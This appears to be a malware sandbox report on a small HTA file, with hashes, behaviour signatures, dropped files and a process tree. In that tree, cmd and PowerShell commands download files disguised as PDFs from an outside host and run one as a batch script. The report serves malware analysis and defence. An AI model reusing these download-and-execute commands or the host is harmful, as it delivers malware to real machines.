Overview

overview

7

Static

static

1

doc(1).hta

windows7-x64

3

doc(1).hta

windows10-2004-x64

7

Analysis

  • max time kernel
    30s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    27/03/2023, 09:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    doc(1).hta

  • Size

    863B

  • MD5

    2a876878eb744982978d6fc5228b6316

  • SHA1

    6d01b2eddc73cda76aa99222f8a300c3ee26719b

  • SHA256

    7d574958aa9f19ed8177ed91a0d9a1c0e222fa749046239aee7ff326880ea230

  • SHA512

    6f048014b5efaf1ad7a5c3a2242658854650bc251b80941c9ff9e1e8bf99bf4e04b2384476c741f769e5391e3de2b8d441a793fe0dc128ea84719354127ca5de

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\doc(1).hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1268
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri http://shopdataserver4.sytes.net/pdf/z.pdf -OutFile $env:tmp\kim.bat; Start-Sleep -Seconds 5 C:\Users\Admin\AppData\Local\Temp\kim.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1388
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Invoke-WebRequest -Uri http://shopdataserver4.sytes.net/pdf/z.pdf -OutFile $env:tmp\kim.bat; Start-Sleep -Seconds 5 C:\Users\Admin\AppData\Local\Temp\kim.bat
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:552
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri http://shopdataserver4.sytes.net/pdf/b.pdf -OutFile $env:tmp\Note.txt; Start-Sleep -Seconds 5 C:\Users\Admin\AppData\Local\Temp\Note.txt
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:596
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Invoke-WebRequest -Uri http://shopdataserver4.sytes.net/pdf/b.pdf -OutFile $env:tmp\Note.txt; Start-Sleep -Seconds 5 C:\Users\Admin\AppData\Local\Temp\Note.txt
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1684

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\51CWKEOKRQWB8LVY21R6.temp
    Filesize

    7KB

    MD5

    40372829434f5ac63cffbd304e62d67b

    SHA1

    789a0c4cc598f3c2290aaf1645346c1b1cea76ef

    SHA256

    981ca88268ac9f88cc3400b75c54522c88da86ce2cb840fb3fa1c871f05c6f68

    SHA512

    64d6dec7ad76d49b61ea9e90c28659554270afaefbdd025a413244527f200dd2cf807e988e8c068ee2b9c9b60683a6cc2466c45fd6afcfe7abe6eb1b71baf9bc

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    40372829434f5ac63cffbd304e62d67b

    SHA1

    789a0c4cc598f3c2290aaf1645346c1b1cea76ef

    SHA256

    981ca88268ac9f88cc3400b75c54522c88da86ce2cb840fb3fa1c871f05c6f68

    SHA512

    64d6dec7ad76d49b61ea9e90c28659554270afaefbdd025a413244527f200dd2cf807e988e8c068ee2b9c9b60683a6cc2466c45fd6afcfe7abe6eb1b71baf9bc

    Download Submit

  • memory/552-56-0x00000000026E0000-0x0000000002720000-memory.dmp

    Filesize

    256KB

    Download

  • memory/552-57-0x00000000026E0000-0x0000000002720000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1684-64-0x0000000002770000-0x00000000027B0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1684-63-0x0000000002770000-0x00000000027B0000-memory.dmp

    Filesize

    256KB

    Download